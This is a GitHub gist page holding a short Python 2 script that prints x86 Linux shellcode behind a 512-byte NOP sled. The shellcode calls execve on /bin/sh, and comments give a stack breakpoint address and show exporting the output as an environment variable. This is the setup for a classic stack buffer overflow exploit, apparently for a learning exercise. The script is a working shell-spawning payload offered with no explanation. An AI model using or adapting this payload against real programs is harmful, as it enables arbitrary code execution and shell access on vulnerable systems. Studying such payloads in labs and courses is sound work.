Skip to content

Instantly share code, notes, and snippets.

@nicot
Created October 28, 2015 00:50
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nicot/33211fd2969c151837ae to your computer and use it in GitHub Desktop.
Save nicot/33211fd2969c151837ae to your computer and use it in GitHub Desktop.
#!/usr/bin/python
sc = \
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43" +\
"\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5" +\
"\xff\xff\xff/bin/shxAAAABBBB"
print "\x90"*512+sc
# breakpoint 0xbffffef4
# usage: export sc="$(~/shell_code.py)"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment